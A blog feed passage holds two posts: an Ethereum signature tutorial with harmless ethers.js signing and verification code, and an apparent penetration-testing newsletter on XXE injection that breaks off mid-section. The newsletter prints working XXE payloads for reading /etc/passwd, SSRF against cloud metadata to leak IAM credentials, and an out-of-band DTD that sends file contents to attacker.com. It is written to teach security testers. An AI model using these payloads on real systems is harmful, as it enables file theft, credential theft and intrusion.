Picture a signature on a check. One smooth motion of your pen, right? Simple.

Now imagine if that signature could do more than just prove you wrote it. What if, just by looking at it, someone could verify it came from you, figure out who you are, and confirm you actually meant to sign that specific check, all without ever asking you a single question?

That&apos;s what an Ethereum signature does. And it&apos;s made up of three pieces. **r**, **s**, and **v**.

### The Three Components. r, s, v, Your Signature&apos;s DNA

```javascript
// A typical Ethereum signature
const signature = {
  r: &quot;0x1234567890abcdef...&quot;, // 32 bytes
  s: &quot;0xfedcba0987654321...&quot;, // 32 bytes
  v: 27 // or 28 (1 byte - recovery identifier)
};

// Often serialized as a single 65-byte hex string:
// &quot;0x&quot; + r (64 chars) + s (64 chars) + v (2 chars)
const compactSig = &quot;0x1234...27&quot;;
```

Let&apos;s demystify these three letters:

**r - The Random Point**. This is the x-coordinate of a random point on the elliptic curve. Think of it as the first half of your cryptographic proof. It&apos;s 32 bytes of pure mathematical certainty.

**s - The Signature Proof**. This is where your private key comes into play. The &apos;s&apos; value is derived from both the message hash AND your private key. It&apos;s the part that says &quot;Yes, the owner of this private key really did sign this message.&quot; Another 32 bytes.

**v - The Recovery ID**. Here&apos;s the clever bit. Remember how your public key can&apos;t be derived from your address? Well, the &apos;v&apos; value (either 27 or 28) is a tiny breadcrumb that lets anyone recover your public key from your signature. Just 1 byte, but it&apos;s mighty important.

Together, these three components take up 65 bytes. That&apos;s it. 65 bytes of mathematical proof that you, and only you, signed something.
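Since the serialization is just fixed-width concatenation, pulling r, s, and v back out of a compact signature is plain string slicing. Here&apos;s a dependency-free sketch; the signature in it is a synthetic placeholder built from repeated bytes, not a real signature.

```javascript
// Split a 65-byte compact signature (0x plus 130 hex chars) into r, s, v.
// Layout: r is bytes 0-31, s is bytes 32-63, v is byte 64.
function splitSignature(compact) {
  const hex = compact.replace(/^0x/, ``);
  if (hex.length !== 130) throw new Error(`expected 65 bytes of signature`);
  return {
    r: `0x` + hex.slice(0, 64),
    s: `0x` + hex.slice(64, 128),
    v: parseInt(hex.slice(128, 130), 16), // 27 or 28 for message signatures
  };
}

// Synthetic example values, not a real signature:
const fake = `0x` + `11`.repeat(32) + `22`.repeat(32) + `1b`;
const { r, s, v } = splitSignature(fake);
console.log(r); // 0x1111...
console.log(s); // 0x2222...
console.log(v); // 27 (0x1b)
```

This is essentially what `ethers.Signature.from()` does for you, plus normalization and sanity checks.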

### Transaction Signatures vs Message Signatures. Two Flavors, Different Purposes

Here&apos;s where things get interesting. Ethereum has two types of signatures, and confusing them is like mixing up a deposit slip with a blank check. Both involve your signature, but the consequences are very different.

#### 1. Transaction Signatures. The Autopilot

Ever notice how when you send ETH or interact with a smart contract, MetaMask just... handles it? You click &quot;Confirm,&quot; and your wallet automatically signs the transaction.

That&apos;s a transaction signature. It&apos;s automatic, built into the process:

```javascript
// When you send a transaction, it&apos;s automatically signed
const tx = await signer.sendTransaction({
  to: &quot;0x742d35Cc6634C0532925a3b844Bc454e4438f44e&quot;, // any valid recipient address
  value: ethers.parseEther(&quot;1.0&quot;)
});

// The transaction object contains r, s, v internally
// You don&apos;t manually create the signature
```

**What&apos;s actually being signed here?**

Your wallet takes all the transaction details (nonce, gas price, gas limit, recipient address, value, data, and chain ID) and packages them using **RLP encoding** (Recursive Length Prefix). RLP is Ethereum&apos;s way to serialize data into a compact byte array. This RLP-encoded transaction gets hashed with Keccak-256, and that hash is what actually gets signed with your private key.

This signature goes on-chain. Ethereum nodes verify it automatically. If the signature is valid, the transaction executes. If not, it&apos;s rejected. No human judgment involved.
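To make RLP less abstract, here&apos;s a minimal sketch of the encoder covering only the short cases (byte strings and lists whose payloads fit in 55 bytes). Real transaction encoding also needs the long-length forms from the Yellow Paper, so treat this as an illustration, not a production encoder. The two expected outputs are the canonical RLP examples for `&quot;dog&quot;` and `[&quot;cat&quot;, &quot;dog&quot;]`.

```javascript
// Minimal RLP encoder sketch: byte strings and lists, payloads up to 55 bytes.
function rlpEncode(item) {
  if (Array.isArray(item)) {
    const payload = Buffer.concat(item.map(rlpEncode));
    if (payload.length > 55) throw new Error(`long form not implemented`);
    // List prefix: 0xc0 plus the payload length
    return Buffer.concat([Buffer.from([0xc0 + payload.length]), payload]);
  }
  const buf = Buffer.from(item, `utf8`);
  if (buf.length === 1) {
    if (0x80 > buf[0]) return buf; // a single byte below 0x80 is its own encoding
  }
  if (buf.length > 55) throw new Error(`long form not implemented`);
  // String prefix: 0x80 plus the byte length
  return Buffer.concat([Buffer.from([0x80 + buf.length]), buf]);
}

console.log(rlpEncode(`dog`).toString(`hex`));          // 83646f67
console.log(rlpEncode([`cat`, `dog`]).toString(`hex`)); // c88363617483646f67
```

A real transaction is just a list of fields (nonce, gas price, and so on) pushed through this same scheme, then hashed with Keccak-256 to produce the digest that gets signed.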

#### 2. Message Signatures. The Manual Handshake

Now, what if you just want to prove you own an address without spending any gas? What if a website wants you to log in with your wallet? What if you&apos;re voting in a DAO?

Enter message signatures. These are explicit, manual, and **dangerous if you don&apos;t understand them**.

```javascript
// You explicitly sign a message
const message = &quot;I authorize this action&quot;;
const signature = await signer.signMessage(message);

// What actually gets signed includes a prefix:
// &quot;\x19Ethereum Signed Message:\n&quot; + len(message) + message
```

Unlike transactions, message signatures:
- Don&apos;t cost gas
- Don&apos;t change the blockchain
- Are used for off-chain verification (authentication, proofs of ownership, etc.)
- Can be verified by anyone, anywhere, smart contracts, websites, backend servers

But here&apos;s the critical part: **message signatures are manually verified**. A smart contract or backend has to explicitly check them. And if the checking code is buggy or malicious? You&apos;re signing away your security.

### The ETH Prefix. The Security Feature That Saves Your Assets

Now let me tell you about one of the most elegant security features in Ethereum, one that most people don&apos;t even know exists.

When you sign a message, Ethereum doesn&apos;t actually sign your message directly. Instead, it adds a special prefix as defined in [EIP-191](https://eips.ethereum.org/EIPS/eip-191):

```
\x19Ethereum Signed Message:\n&lt;length&gt;&lt;message&gt;
```

**Why does this matter? Because it prevents a clever attack.**

Imagine this scenario. A website asks you to sign a message that says &quot;I am the owner of this wallet.&quot; Seems harmless, right? You&apos;re just proving ownership, no money is moving.

But what if an attacker could take that same signature and use it as a transaction signature? What if they crafted a transaction that, when hashed, produced the exact same hash as your &quot;harmless&quot; message?

Without the prefix, they could. Your message signature could become a transaction signature. Your innocent proof of ownership could become authorization to drain your wallet.

**The prefix makes this impossible.**

By adding `\x19Ethereum Signed Message:\n` before your message, Ethereum ensures that:
1. A message signature can never look like a transaction signature
2. A transaction signature can never look like a message signature
3. You can never accidentally sign a transaction when you think you&apos;re just signing a message

**Here&apos;s what actually gets signed when you sign &quot;Hello World&quot;:**

```javascript
const message = &quot;Hello World&quot;;
// Actual signed data:
// &quot;\x19Ethereum Signed Message:\n11Hello World&quot;
//                                 ^^
//                         length = 11 bytes
```

That `\x19` is a special byte that tells Ethereum &quot;this is a message signature, not a transaction.&quot; The rest is human-readable. &quot;Ethereum Signed Message&quot; followed by the length (11 characters) and then your message.

Simple. Elegant. And it&apos;s saved countless wallets from being drained.

But here&apos;s the thing: not all signature schemes have this protection. As we&apos;ll see in later posts, there are ways to trick users into signing things they shouldn&apos;t. The prefix helps, but it&apos;s not a silver bullet.

![](/content/images/2025/11/signature-flows.svg)

*Key difference between Transaction and Message signature flows - note the ETH prefix in message signatures*

## Hands-on Demo. Time to Get Your Hands Dirty

Alright, enough theory. Let&apos;s actually do this.

I&apos;m going to walk you through four practical examples that will cement your understanding of how Ethereum signatures work. By the end, you&apos;ll have working code that signs messages, verifies them, and even builds a complete authentication system.

Grab a coffee. Fire up your terminal. Let&apos;s build.

### Setup. Getting Your Tools Ready

First, you&apos;ll need ethers.js, the Swiss Army knife of Ethereum development:

```bash
npm install ethers
```

That&apos;s it. Now we&apos;re ready to sign some messages.

### Example 1. Creating Your First Signature

Let&apos;s start simple. We&apos;re going to create a wallet, sign a message, and see what a signature actually looks like under the hood.

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function signMessage() {
  // Create a random wallet (or use existing private key)
  const wallet = ethers.Wallet.createRandom();

  console.log(&quot;Address:&quot;, wallet.address);
  console.log(&quot;Private Key:&quot;, wallet.privateKey);

  // The message we want to sign
  const message = &quot;I am the owner of this address&quot;;

  // Sign the message
  const signature = await wallet.signMessage(message);

  console.log(&quot;\nMessage:&quot;, message);
  console.log(&quot;Signature:&quot;, signature);

  // Break down the signature into r, s, v
  const sig = ethers.Signature.from(signature);
  console.log(&quot;\nSignature components:&quot;);
  console.log(&quot;r:&quot;, sig.r);
  console.log(&quot;s:&quot;, sig.s);
  console.log(&quot;v:&quot;, sig.v);

  return { wallet, message, signature };
}

signMessage();
```

**Run this code and you&apos;ll see something like:**

![](/content/images/2025/10/first-signature.png)

*The full signature and its r, s, v components*

Look at that. That long hexadecimal string is your signature, 65 bytes of cryptographic proof. The `r`, `s`, and `v` components we talked about earlier? There they are, broken down for you.

**Here&apos;s what just happened:**
1. We created a random wallet (never do this in production, obviously, use a secure key management system)
2. We signed a simple message
3. We broke the signature down into its components

This signature now proves that the owner of that address signed that exact message. Change a single character in the message, and the signature becomes invalid.

### Example 2. The Magic of Signature Verification

Now let&apos;s verify a signature. This is where the magic happens, where we can prove, without a doubt, that someone who controls a specific address signed a specific message.

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function verifySignature() {
  // Original signer
  const wallet = ethers.Wallet.createRandom();
  const message = &quot;Authenticate me&quot;;
  const signature = await wallet.signMessage(message);

  console.log(&quot;Original signer:&quot;, wallet.address);

  // Verify signature by recovering the address
  const recoveredAddress = ethers.verifyMessage(message, signature);

  console.log(&quot;Recovered address:&quot;, recoveredAddress);
  console.log(&quot;Signature valid:&quot;, recoveredAddress === wallet.address);

  // Try with wrong message (should fail)
  const wrongMessage = &quot;Different message&quot;;
  const recoveredWrong = ethers.verifyMessage(wrongMessage, signature);

  console.log(&quot;\nWith wrong message:&quot;, recoveredWrong);
  console.log(&quot;Signature valid:&quot;, recoveredWrong === wallet.address);
}

verifySignature();
```

**The output tells the story:**

![](/content/images/2025/10/second_signature.png)

*Verifying the same signature against a different message*

With the correct message, we recovered the exact address that signed it. Perfect match. Valid signature.

But when we tried to verify the same signature with a different message, we got a completely different address back, and the verification failed.

This is the beauty of cryptographic signatures. The signature is bound to both the message AND the private key. Change either one, and the math breaks. There&apos;s no way to forge it, no way to modify the message after signing. The signature is proof of exactly what was signed, by exactly whom.

This is why phishing attacks in Web3 are so devastating. If an attacker tricks you into signing a malicious message, that signature is cryptographically valid. There&apos;s no disputing it. The blockchain doesn&apos;t care about your intentions, only about the math.


### Example 3. Peeking Under the Hood, The Prefix in Action

Remember that ETH prefix I told you about? Let&apos;s actually see it in action. This example shows you what Ethereum is really signing when you think you&apos;re just signing &quot;Hello&quot;.

Let&apos;s see what actually gets hashed when signing:

```javascript
const { ethers } = require(&apos;ethers&apos;);

function demonstratePrefix() {
  const message = &quot;Hello&quot;;

  // What ethers.js does internally:
  // 1. Create the prefixed message
  const prefix = &quot;\x19Ethereum Signed Message:\n&quot;;
  const messageBytes = ethers.toUtf8Bytes(message);
  const prefixedMessage = ethers.concat([
    ethers.toUtf8Bytes(prefix),
    ethers.toUtf8Bytes(String(messageBytes.length)),
    messageBytes
  ]);

  console.log(&quot;Original message:&quot;, message);
  console.log(&quot;Message bytes:&quot;, ethers.hexlify(messageBytes));
  console.log(&quot;Prefixed message:&quot;, ethers.hexlify(prefixedMessage));

  // 2. Hash the prefixed message
  const messageHash = ethers.keccak256(prefixedMessage);
  console.log(&quot;\nFinal hash to sign:&quot;, messageHash);

  // Compare with ethers.js helper
  const expectedHash = ethers.hashMessage(message);
  console.log(&quot;ethers.hashMessage:&quot;, expectedHash);
  console.log(&quot;Match:&quot;, messageHash === expectedHash);
}

demonstratePrefix();
```

**The output reveals the truth:**


![](/content/images/2025/10/prefix_signature.png)

*Verifying that the prefix is also signed*

1. Your original message, `&quot;Hello&quot;`, is `0x48656c6c6f` in hex
2. But Ethereum doesn&apos;t sign that directly. It prepends `\x19Ethereum Signed Message:\n5` (where 5 is the message length in bytes)
3. The full prefixed message in hex: `0x19457468657265756d205369676e6564204d6573736167653a0a3548656c6c6f`
4. That gets hashed with Keccak-256, producing your final hash

This is what actually gets signed. Not &quot;Hello&quot;, the whole prefixed string.

Why does this matter? Because if you&apos;re ever building a system that verifies Ethereum signatures, you need to reconstruct this exact prefix. Miss it, and your signature verification will fail every time.
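If you need that reconstruction outside of ethers.js, it&apos;s a few lines of plain Node. This dependency-free sketch rebuilds the prefixed byte string and reproduces the exact hex shown above for `&quot;Hello&quot;`:

```javascript
// Rebuild the EIP-191 prefixed message without any library.
// The length is the message length in bytes, appended as ASCII digits.
function eip191Bytes(message) {
  const body = Buffer.from(message, `utf8`);
  const prefix = Buffer.from(`\x19Ethereum Signed Message:\n` + String(body.length), `utf8`);
  return Buffer.concat([prefix, body]);
}

const hex = `0x` + eip191Bytes(`Hello`).toString(`hex`);
console.log(hex);
// 0x19457468657265756d205369676e6564204d6573736167653a0a3548656c6c6f
```

Hash that byte string with Keccak-256 and you have the digest that actually gets signed, the same value `ethers.hashMessage()` produces.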

### Example 4. Building a Real Authentication System

Now let&apos;s put it all together. This is how sites like OpenSea and Uniswap let you &quot;sign in with Ethereum&quot; without passwords, databases, or any traditional auth infrastructure.

Here&apos;s a practical example of how signatures are used for authentication:

```javascript
const { ethers } = require(&apos;ethers&apos;);

// Simulated backend verification
class AuthenticationService {
  // Step 1. Generate a challenge (nonce)
  generateChallenge(address) {
    const nonce = Math.floor(Math.random() * 1000000); // demo only: use crypto.randomBytes for real nonces
    const timestamp = Date.now();
    const challenge = `Sign this message to authenticate:
Nonce: ${nonce}
Timestamp: ${timestamp}
Address: ${address}

This request will not trigger a blockchain transaction or cost any gas fees.`;

    // Store challenge for this address (in real app, use database)
    this.challenges = this.challenges || {};
    this.challenges[address] = { challenge, timestamp };

    return challenge;
  }

  // Step 2. Verify the signature
  async verifySignature(address, signature, challenge) {
    // Check if challenge exists and is recent (5 min timeout)
    const stored = (this.challenges || {})[address];
    if (!stored) {
      throw new Error(&quot;No challenge found for this address&quot;);
    }

    if (Date.now() - stored.timestamp &gt; 300000) {
      throw new Error(&quot;Challenge expired&quot;);
    }

    if (stored.challenge !== challenge) {
      throw new Error(&quot;Challenge mismatch&quot;);
    }

    // Recover address from signature
    const recoveredAddress = ethers.verifyMessage(challenge, signature);

    // Verify it matches
    if (recoveredAddress.toLowerCase() !== address.toLowerCase()) {
      throw new Error(&quot;Signature verification failed&quot;);
    }

    // Clean up used challenge
    delete this.challenges[address];

    return true;
  }
}

// Simulated frontend
async function authenticateUser() {
  const wallet = ethers.Wallet.createRandom();
  const authService = new AuthenticationService();

  console.log(&quot;=== Web3 Authentication Demo ===\n&quot;);
  console.log(&quot;User address:&quot;, wallet.address);

  // Step 1. Request challenge from backend
  const challenge = authService.generateChallenge(wallet.address);
  console.log(&quot;\nChallenge from server:&quot;);
  console.log(challenge);

  // Step 2. User signs the challenge
  const signature = await wallet.signMessage(challenge);
  console.log(&quot;\nUser signature:&quot;);
  console.log(signature);

  // Step 3. Send signature to backend for verification
  try {
    const verified = await authService.verifySignature(
      wallet.address,
      signature,
      challenge
    );
    console.log(&quot;\n✓ Authentication successful!&quot;);
    console.log(&quot;User is now logged in&quot;);
  } catch (error) {
    console.log(&quot;\n✗ Authentication failed:&quot;, error.message);
  }
}

authenticateUser();
```

**The beautiful, password-free dance:**

![](/content/images/2025/10/auth.png)

*Basic authentication example*

1. **Server generates a unique challenge**. It includes a random nonce and timestamp. This prevents replay attacks, someone can&apos;t reuse an old signature to log in later.

2. **User signs the challenge**. Your wallet pops up, shows you the message, you click &quot;Sign.&quot; No password entered. No session cookie created. Just a signature.

3. **Server verifies the signature**. It uses `ethers.verifyMessage()` to recover the address from the signature. If it matches the address you claimed to be, you&apos;re in. If not, rejected.

No database of passwords to breach. No session tokens to steal. No password reset flow to exploit. Just pure cryptographic proof of identity.

This is the pattern used by OpenSea, Uniswap, ENS, and countless other dApps. It&apos;s elegant, it&apos;s secure, and it&apos;s fundamentally different from traditional auth.

**But here&apos;s the catch:** This entire system relies on users actually reading what they&apos;re signing. If an attacker can trick you into signing a malicious message (maybe one that grants them token approvals), your authentication system becomes an attack vector.

We&apos;ll dive deep into these attacks in future posts. For now, just remember: **the signature is only as secure as what you&apos;re signing**.

## Key Takeaways. What You Need to Remember

If you forget everything else from this post, remember these five things:

### 1. Your Signature IS Your Identity

There&apos;s no password reset button in Web3. No customer support to call. Your private key is your identity, and your signature is proof you control it.

Think of it this way. In traditional apps, you prove who you are by knowing a secret (your password). In Web3, you prove who you are by being able to create a signature that only the owner of the private key could create. The difference? One can be guessed or stolen from a server. The other is mathematically impossible to forge.

- Your private key never leaves your wallet
- Your signature proves you control an address
- No central authority verifies you, only mathematics
- Lose your key, lose everything. No exceptions.

### 2. Two Types of Signatures, Two Different Worlds

| Aspect | Transaction Signatures | Message Signatures |
|--------|----------------------|-------------------|
| **Creation** | Automatic (wallet handles it) | Manual (you explicitly sign) |
| **Purpose** | Change blockchain state | Prove ownership/authenticate |
| **Encoding** | RLP (complex, includes nonce) | ETH prefix (`\x19Ethereum Signed Message:\n`) |
| **Verification** | Automatic by network nodes | Manual by smart contracts or backends |
| **Cost** | Requires gas fees | Free (off-chain) |
| **Risk** | Clear, moving funds/executing code | Hidden, can be used for approvals |

Transaction signatures are obvious, you&apos;re sending ETH, minting an NFT, doing something on-chain. Message signatures are sneaky, they look innocent but can authorize dangerous things.

### 3. The Prefix Saved Your Wallet (And You Didn&apos;t Even Know It)

The `\x19Ethereum Signed Message:\n` prefix is a silent guardian. It ensures that a harmless &quot;prove you own this wallet&quot; signature can never be reused as a transaction signature.

Without it? An attacker could trick you into signing a message, then use that signature to drain your funds. With it? Those two worlds stay separate.

### 4. r, s, v, The DNA of Every Signature

Every signature has three components:
- **r and s**. The cryptographic proof (64 bytes total)
- **v**. The recovery hint that lets us figure out your public key (1 byte)

All three are needed. Miss one, and the signature is useless.

### 5. This is Just the Foundation

Everything we&apos;ve covered, ECDSA, Keccak-256, signature anatomy, the prefix, this is the bedrock of Web3 security. Every exploit, every attack, every vulnerability in this space ultimately comes down to signatures.

Understanding this foundation means you can:
- Spot phishing attacks before you sign
- Understand why certain smart contract patterns are dangerous
- Build more secure dApps
- Audit code for signature-related vulnerabilities

And here&apos;s the thing: **most Web3 developers don&apos;t understand this deeply enough**. Most users certainly don&apos;t. That&apos;s why signature-based attacks are so common and so devastating.

## Technical References

### Ethereum Standards and Specifications

1. **[EIP-191 - Signed Data Standard](https://eips.ethereum.org/EIPS/eip-191)**
   The official Ethereum Improvement Proposal defining the `\x19Ethereum Signed Message` prefix and signed data format. This is the authoritative source for message signature standards.

2. **[Ethereum Yellow Paper](https://ethereum.github.io/yellowpaper/paper.pdf)**
   Gavin Wood&apos;s formal specification of the Ethereum protocol, including the ECDSA signature scheme and transaction structure.

3. **[Ethers.js Documentation - Signing](https://docs.ethers.org/v6/api/wallet/)**
   Official documentation for the ethers.js library used in all code examples. Covers wallet creation, message signing, and signature verification.

### Cryptographic Standards

4. **[SEC 2 - secp256k1 Curve Parameters](https://www.secg.org/sec2-v2.pdf)**
   Standards for Efficient Cryptography Group specification of the secp256k1 elliptic curve used by both Bitcoin and Ethereum.

5. **[ECDSA - Elliptic Curve Digital Signature Algorithm](https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm)**
   Comprehensive explanation of the ECDSA signature algorithm and the Elliptic Curve Discrete Logarithm Problem (ECDLP).

6. **[NIST FIPS 202 - SHA-3 Standard](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf)**
   Official SHA-3 specification. Note that Ethereum uses the original Keccak-256, not the final SHA3-256 standard.

7. **[Keccak Team - Original SHA-3 Submission](https://keccak.team/keccak.html)**
   Documentation from the Keccak team explaining the difference between the original Keccak and the final SHA-3 standard.

### Security Research and Case Studies

8. **[Rekt.news](https://rekt.news/)**
   Documented Web3 exploits and post-mortems. See real-world examples of signature-based attacks.

9. **[Trail of Bits - Smart Contract Security](https://blog.trailofbits.com/)**
   Security research from one of the leading blockchain security firms, including signature vulnerability research.

10. **[ConsenSys - Smart Contract Best Practices](https://consensys.github.io/smart-contract-best-practices/)**
    Security guidelines including signature verification patterns and common pitfalls.

### Additional Resources

11. **[Bitcoin Wiki - secp256k1](https://en.bitcoin.it/wiki/Secp256k1)**
    Detailed explanation of the secp256k1 curve parameters and security properties.

12. **[Ethereum Stack Exchange - Keccak vs SHA-256](https://ethereum.stackexchange.com/questions/550/which-cryptographic-hash-function-does-ethereum-use)**
    Community discussion explaining why Ethereum uses Keccak-256 and the technical differences.


## Final Thoughts

Here&apos;s the truth: signatures are simultaneously the most secure and most vulnerable part of Web3.

Secure because the math, implemented correctly, is effectively unbreakable. No quantum computer is cracking ECDSA anytime soon. The cryptography is sound.

Vulnerable because humans are the weak link. We click &quot;Sign&quot; without reading. We trust interfaces that lie to us. We assume that &quot;signing to authenticate&quot; is always safe.

It&apos;s not.

Every major Web3 exploit, from the $600M Poly Network hack to the countless phishing attacks draining wallets daily, exploits this gap between cryptographic perfection and human fallibility.

Understanding signatures isn&apos;t just about passing an interview or building a dApp. It&apos;s about survival in an ecosystem where a single mistaken signature can cost you everything you own.

So take this knowledge seriously. Test the code. Break things in your local environment. Build security into your mental models from day one.

Because in Web3, there&apos;s no undo button.</content:encoded><author>Ruben Santos</author></item><item><title>XXE Injection: When XML Parsers Become Your Worst Enemy</title><link>https://www.kayssel.com/newsletter/issue-22</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-22</guid><description>From basic file disclosure to blind out-of-band exfiltration: a practical guide to finding and exploiting XXE vulnerabilities</description><pubDate>Sun, 02 Nov 2025 10:00:00 GMT</pubDate><content:encoded>Hey everyone,

A few weeks ago, a colleague was testing an internal API and stumbled on an XXE vulnerability. The thing is, it was blind. No direct output, no error messages, nothing. We knew the parser was processing our entities, but we couldn&apos;t figure out how to exfiltrate the data properly. We tried a few OOB techniques, but honestly, we didn&apos;t nail the exploitation.

That stuck with me. I hate leaving vulnerabilities half-exploited. So I spent some time digging deeper into blind XXE, out-of-band exfiltration, and all the edge cases we probably missed.

The thing about XXE is that it&apos;s one of those vulnerabilities that feels almost too easy when you find it. But when you don&apos;t know what to look for, you&apos;ll walk right past it. And that&apos;s exactly why it keeps showing up in penetration tests, bug bounty reports, and CVEs year after year.

So let&apos;s fix that. This newsletter breaks down XML External Entity (XXE) injection: what it is, how it works, and how to exploit it from basic file disclosure to blind out-of-band exfiltration.

## What XXE Actually Is

XXE is a vulnerability that lets you abuse how XML parsers process external entities. When an application parses XML without properly configuring its parser, you can inject malicious entity declarations that force the server to:

- Read arbitrary files from the filesystem
- Make HTTP requests to internal systems (SSRF)
- Perform denial of service attacks
- In rare cases, achieve remote code execution

The root cause is simple: the XML 1.0 specification allows entities (basically variables in XML) to reference external resources. If the parser follows those references and the input isn&apos;t sanitized, attackers control what gets loaded.

Here&apos;s the basic structure of an XXE payload:

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;data&gt;&amp;xxe;&lt;/data&gt;
&lt;/root&gt;
```

When the parser processes this, it reads `/etc/passwd` and injects its contents where `&amp;xxe;` appears. If that data shows up in the application&apos;s response, you&apos;ve got file disclosure.

## Why This Still Matters in 2025

You&apos;d think this would be fixed by now, right? It&apos;s been on the OWASP Top 10 since 2017. But XXE vulnerabilities keep showing up.

**Recent examples:**

- **[CVE-2024-34102](https://nvd.nist.gov/vuln/detail/CVE-2024-34102) (CosmicSting)** – A critical unauthenticated XXE in Adobe Commerce and Magento that could lead to remote code execution. Affected versions before 2.4.7-p1. CVSS score: 9.8/10.

- **[CVE-2024-30043](https://nvd.nist.gov/vuln/detail/CVE-2024-30043)** – XXE in Microsoft SharePoint Server allowing file read with Farm Service account permissions and SSRF attacks. Patched in May 2024.

- **[CVE-2023-42344](https://vulners.com/cve/CVE-2023-42344)** – Unauthenticated XXE in OpenCMS (versions 9.0.0 to 10.5.0) allowing remote code execution without authentication.

These aren&apos;t small apps. These are enterprise platforms with millions of users. The problem? Legacy code, third-party libraries with insecure defaults, and developers who don&apos;t realize their XML parser is dangerous out of the box.

## Finding XXE Vulnerabilities

Not every endpoint that accepts XML is vulnerable. Modern frameworks often disable external entities by default. But you&apos;d be surprised how many don&apos;t.

### Where to Look

Check any functionality that processes XML:

- File uploads (especially DOCX, XLSX, SVG, or other XML-based formats)
- API endpoints that accept `Content-Type: application/xml`
- SOAP services
- RSS/Atom feed parsers
- SAML authentication flows
- Configuration file uploads

### Testing for XXE

Start with a basic probe. Send this payload and see if the parser even processes entities:

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY test &quot;HelloXXE&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;data&gt;&amp;test;&lt;/data&gt;
&lt;/root&gt;
```

If the response includes &quot;HelloXXE&quot; where you referenced `&amp;test;`, the parser is processing entities. Now you can escalate.

## Basic File Disclosure

The classic XXE attack: read files from the server&apos;s filesystem.

&lt;details&gt;
&lt;summary&gt;Payload to read /etc/passwd:&lt;/summary&gt;

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;username&gt;&amp;xxe;&lt;/username&gt;
&lt;/root&gt;
```
&lt;/details&gt;

If the application reflects the `&lt;username&gt;` value in its response, you&apos;ll see the contents of `/etc/passwd`.

**Common files to target:**

- `/etc/passwd` – User accounts (Linux/Unix)
- `/etc/hosts` – Network configuration
- `C:\Windows\System32\drivers\etc\hosts` – Windows hosts file
- `/proc/self/environ` – Environment variables (might leak secrets)
- Application config files (e.g., `/var/www/html/config.php`)
- Cloud metadata endpoints (more on this in a sec)

One thing to watch out for: some files contain characters that break XML parsing (like `&lt;` or `&amp;`). We&apos;ll handle that with Base64 encoding in the blind XXE section.

## XXE to SSRF

This is where XXE gets really interesting. Instead of reading local files, you can make the server send HTTP requests to internal systems.

&lt;details&gt;
&lt;summary&gt;Example payload:&lt;/summary&gt;

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY xxe SYSTEM &quot;http://internal-service:8080/admin&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;data&gt;&amp;xxe;&lt;/data&gt;
&lt;/root&gt;
```
&lt;/details&gt;

The server makes an HTTP request to `http://internal-service:8080/admin` and includes the response in its output. This bypasses firewalls and gives you access to internal APIs, admin panels, or cloud metadata endpoints.

**Cloud metadata exploitation:**

If you&apos;re testing an app running on AWS, try this:

```xml
&lt;!ENTITY xxe SYSTEM &quot;http://169.254.169.254/latest/meta-data/iam/security-credentials/&quot;&gt;
```

This hits the AWS metadata service (IMDSv1) and can leak IAM credentials with full access to the cloud account. The same idea applies to Azure (`http://169.254.169.254/metadata/instance?api-version=2021-02-01`) and GCP, with one catch: both require a custom request header (`Metadata: true` and `Metadata-Flavor: Google` respectively) that a plain external entity can&apos;t send, so they&apos;re usually out of reach for basic XXE. AWS IMDSv2 adds a similar token requirement.

Combined with my [SSRF newsletter from Issue 4](https://www.kayssel.com/post/ssrf/), you can chain XXE into full internal network access.

## Blind XXE: When You Don&apos;t See Output

Sometimes the application doesn&apos;t reflect the XML data in its response. The parser processes your payload, but you don&apos;t see the result. That&apos;s blind XXE.

### Out-of-Band (OOB) Exfiltration

The trick here is to make the server send the data to a system you control. You need two things:

1. A server you control to receive the data (use Burp Collaborator, your own VPS, or `webhook.site`)
2. A payload that references an external DTD hosted on your server

**Step 1: Host a malicious DTD on your server (`http://attacker.com/evil.dtd`):**

```xml
&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfil SYSTEM &apos;http://attacker.com/?data=%file;&apos;&gt;&quot;&gt;
%eval;
%exfil;
```

**Step 2: Send this payload to the target:**

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY % dtd SYSTEM &quot;http://attacker.com/evil.dtd&quot;&gt;
  %dtd;
]&gt;
&lt;root&gt;&lt;/root&gt;
```

Here&apos;s what happens:

1. The parser loads your external DTD
2. The DTD defines a parameter entity that reads `/etc/passwd`
3. It defines another entity that makes an HTTP request to your server, embedding the file contents in the URL
4. Your server receives the request with the file data in the query string

**Pro tip:** If the file contains special characters that break URLs, wrap it in Base64 with PHP&apos;s filter wrapper (this only works when the target parser runs on PHP):

```xml
&lt;!ENTITY % file SYSTEM &quot;php://filter/convert.base64-encode/resource=/etc/passwd&quot;&gt;
```

Then Base64-decode the exfiltrated data on your end.
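On the receiving side, recovering the file from your access log is a one-liner. A hypothetical `decode_exfil` helper, assuming your listener logged the full request URL:

```python
import base64
from urllib.parse import parse_qs, urlparse

def decode_exfil(logged_url):
    # Pull the 'data' query parameter and Base64-decode it
    # back into the original file contents.
    params = parse_qs(urlparse(logged_url).query)
    return base64.b64decode(params['data'][0])
```

Standard Base64 can contain `+` and `=`, which some servers mangle in query strings, so check the raw log line if the decode fails.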

### Error-Based Blind XXE

If OOB doesn&apos;t work (firewalls, no egress, etc.), you can sometimes leak data through error messages. This technique also typically requires an external DTD.

**Malicious DTD hosted on your server (`http://attacker.com/error.dtd`):**

```xml
&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
